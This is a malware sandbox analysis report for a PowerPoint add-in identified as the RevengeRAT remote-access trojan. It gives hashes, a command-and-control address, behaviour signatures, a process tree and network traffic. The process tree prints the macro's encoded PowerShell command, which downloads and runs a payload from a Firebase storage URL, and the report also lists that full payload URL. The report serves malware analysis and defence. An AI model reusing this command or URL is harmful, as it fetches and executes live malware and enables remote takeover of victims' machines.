Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    134s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    28/08/2024, 02:33 UTC

General

  • Target

    fc0a96e635fa296eedf0e58cd84ec60e267dd5008e6129449ed62993e00c2e38.ppam

  • Size

    23KB

  • MD5

    855e7ea279a05bb5fa3551d56a830a1b

  • SHA1

    a22cda2ccd4a95a8ccd1510d2f2e7f3d7111d0ae

  • SHA256

    fc0a96e635fa296eedf0e58cd84ec60e267dd5008e6129449ed62993e00c2e38

  • SHA512

    0e8e722ff0f703f74712a79cf4d156ebd1cf5c6731c07589965b058641881e75765b324d29cec1b11b07e88e7080b644d030ece1faaa8675607d462cceb63e8f

  • SSDEEP

    384:dXPcqNJ0PQPGKRrznsrD9t9WrXcuikodj6WG6XRV+7AkmgcsdzJY9t9rqrw13rtr:VPc8GK9n49KDcPkmODMw71msfYVrhBV

Malware Config

Extracted

Family

revengerat

Botnet

NyanCatRevenge

C2

18.228.165.84:3333

Mutex

788bf014999d4ae8929

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\fc0a96e635fa296eedf0e58cd84ec60e267dd5008e6129449ed62993e00c2e38.ppam"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:1512
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2256
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAuAEkAbgB2AG8AawBlACgAJwANAAoAaAB0AHQAcABzADoALwAvAGYAaQByAGUAYgBhAHMAZQBzAHQAbwByAGEAZwBlAC4AZwBvAG8AZwBsAGUAYQBwAGkAcwAuAGMAbwBtAC8AdgAwAC8AYgAvAHMAcABhAG0ALQBjADIANwAzAGEALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AMQA1AC0AMAA4AC0AMgAwADIANAAuAGoAcABnAD8AYQBsAHQAPQBtAGUAZABpAGEAJgB0AG8AawBlAG4APQBkAGIAYQA5ADEAMgBjADAALQBlADgANAAxAC0ANAAyADIANQAtAGEAYgA4ADgALQA4AGIAYQAyADYAMQAyADYANgAxAGUAMgANAAoAJwApADsAIAANAAoAdQBwAFQAQQBvAGkAWABUAEMAdQBVAEMATgBwAHkAegBhAA0ACgA=""
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2072
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1656

    Network

    • flag-us
      DNS
      firebasestorage.googleapis.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      firebasestorage.googleapis.com
      IN A
      Response
      firebasestorage.googleapis.com
      IN A
      172.217.169.42
      firebasestorage.googleapis.com
      IN A
      216.58.212.234
      firebasestorage.googleapis.com
      IN A
      216.58.204.74
      firebasestorage.googleapis.com
      IN A
      216.58.213.10
      firebasestorage.googleapis.com
      IN A
      142.250.200.42
      firebasestorage.googleapis.com
      IN A
      142.250.178.10
      firebasestorage.googleapis.com
      IN A
      142.250.187.234
      firebasestorage.googleapis.com
      IN A
      142.250.187.202
      firebasestorage.googleapis.com
      IN A
      216.58.212.202
      firebasestorage.googleapis.com
      IN A
      172.217.169.10
      firebasestorage.googleapis.com
      IN A
      142.250.180.10
      firebasestorage.googleapis.com
      IN A
      142.250.200.10
      firebasestorage.googleapis.com
      IN A
      142.250.179.234
      firebasestorage.googleapis.com
      IN A
      216.58.201.106
      firebasestorage.googleapis.com
      IN A
      172.217.169.74
      firebasestorage.googleapis.com
      IN A
      172.217.16.234
    • flag-gb
      GET
      https://firebasestorage.googleapis.com/v0/b/spam-c273a.appspot.com/o/15-08-2024.jpg?alt=media&token=dba912c0-e841-4225-ab88-8ba2612661e2
      powershell.exe
      Remote address:
      172.217.169.42:443
      Request
      GET /v0/b/spam-c273a.appspot.com/o/15-08-2024.jpg?alt=media&token=dba912c0-e841-4225-ab88-8ba2612661e2 HTTP/1.1
      Host: firebasestorage.googleapis.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Expires: Wed, 28 Aug 2024 02:34:11 GMT
      Date: Wed, 28 Aug 2024 02:34:11 GMT
      Cache-Control: private, max-age=0
      Last-Modified: Thu, 15 Aug 2024 14:13:59 GMT
      ETag: "98cc7aa7c2bf0075012711d643dbc62f"
      x-goog-generation: 1723731239484184
      x-goog-metageneration: 1
      x-goog-stored-content-encoding: identity
      x-goog-stored-content-length: 821212
      x-goog-meta-firebaseStorageDownloadTokens: dba912c0-e841-4225-ab88-8ba2612661e2
      Content-Type: image/jpeg
      Content-Disposition: inline; filename*=utf-8''15-08-2024.jpg
      x-goog-hash: crc32c=GLPPkw==
      x-goog-hash: md5=mMx6p8K/AHUBJxHWQ9vGLw==
      x-goog-storage-class: STANDARD
      Accept-Ranges: bytes
      Content-Length: 821212
      X-GUploader-UploadID: AHxI1nO9a9iJG6bvnLpyhscJB8MuZnIukmEuM9cqGbRubyiaK4yaehpfgDqjClsKIf3hf6fZfA
      Server: UploadServer
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • 172.217.169.42:443
      https://firebasestorage.googleapis.com/v0/b/spam-c273a.appspot.com/o/15-08-2024.jpg?alt=media&token=dba912c0-e841-4225-ab88-8ba2612661e2
      tls, http
      powershell.exe
      18.9kB
      873.9kB
      387
      638

      HTTP Request

      GET https://firebasestorage.googleapis.com/v0/b/spam-c273a.appspot.com/o/15-08-2024.jpg?alt=media&token=dba912c0-e841-4225-ab88-8ba2612661e2

      HTTP Response

      200
    • 18.228.165.84:3333
      RegSvcs.exe
      152 B
      3
    • 18.228.165.84:3333
      RegSvcs.exe
      152 B
      3
    • 18.228.165.84:3333
      RegSvcs.exe
      152 B
      3
    • 18.228.165.84:3333
      RegSvcs.exe
      152 B
      3
    • 8.8.8.8:53
      firebasestorage.googleapis.com
      dns
      powershell.exe
      76 B
      332 B
      1
      1

      DNS Request

      firebasestorage.googleapis.com

      DNS Response

      172.217.169.42
      216.58.212.234
      216.58.204.74
      216.58.213.10
      142.250.200.42
      142.250.178.10
      142.250.187.234
      142.250.187.202
      216.58.212.202
      172.217.169.10
      142.250.180.10
      142.250.200.10
      142.250.179.234
      216.58.201.106
      172.217.169.74
      172.217.16.234

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1512-14-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1512-20-0x0000000072B6D000-0x0000000072B78000-memory.dmp

      Filesize

      44KB

    • memory/1512-2-0x0000000072B6D000-0x0000000072B78000-memory.dmp

      Filesize

      44KB

    • memory/1512-3-0x0000000005BC0000-0x0000000005CC0000-memory.dmp

      Filesize

      1024KB

    • memory/1512-9-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1512-11-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1512-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1512-18-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1512-0-0x000000002D3E1000-0x000000002D3E2000-memory.dmp

      Filesize

      4KB

    • memory/1512-10-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1512-19-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1512-21-0x0000000005BC0000-0x0000000005CC0000-memory.dmp

      Filesize

      1024KB

    • memory/1512-22-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/1512-51-0x0000000072B6D000-0x0000000072B78000-memory.dmp

      Filesize

      44KB

    • memory/1512-50-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1656-47-0x0000000000400000-0x000000000040A000-memory.dmp

      Filesize

      40KB

    • memory/1656-41-0x0000000000400000-0x000000000040A000-memory.dmp

      Filesize

      40KB

    • memory/1656-37-0x0000000000400000-0x000000000040A000-memory.dmp

      Filesize

      40KB

    • memory/1656-39-0x0000000000400000-0x000000000040A000-memory.dmp

      Filesize

      40KB

    • memory/1656-43-0x0000000000400000-0x000000000040A000-memory.dmp

      Filesize

      40KB

    • memory/1656-48-0x0000000000400000-0x000000000040A000-memory.dmp

      Filesize

      40KB

    • memory/1656-45-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

    • memory/1656-46-0x0000000000400000-0x000000000040A000-memory.dmp

      Filesize

      40KB

    • memory/2072-32-0x0000000002420000-0x0000000002438000-memory.dmp

      Filesize

      96KB

    • memory/2072-25-0x0000000002420000-0x0000000002438000-memory.dmp

      Filesize

      96KB

    • memory/2072-30-0x0000000002420000-0x0000000002438000-memory.dmp

      Filesize

      96KB

    • memory/2072-26-0x0000000002420000-0x0000000002438000-memory.dmp

      Filesize

      96KB

    • memory/2072-28-0x0000000002420000-0x0000000002438000-memory.dmp

      Filesize

      96KB

    • memory/2072-36-0x0000000002420000-0x0000000002438000-memory.dmp

      Filesize

      96KB

    • memory/2072-34-0x0000000002420000-0x0000000002438000-memory.dmp

      Filesize

      96KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.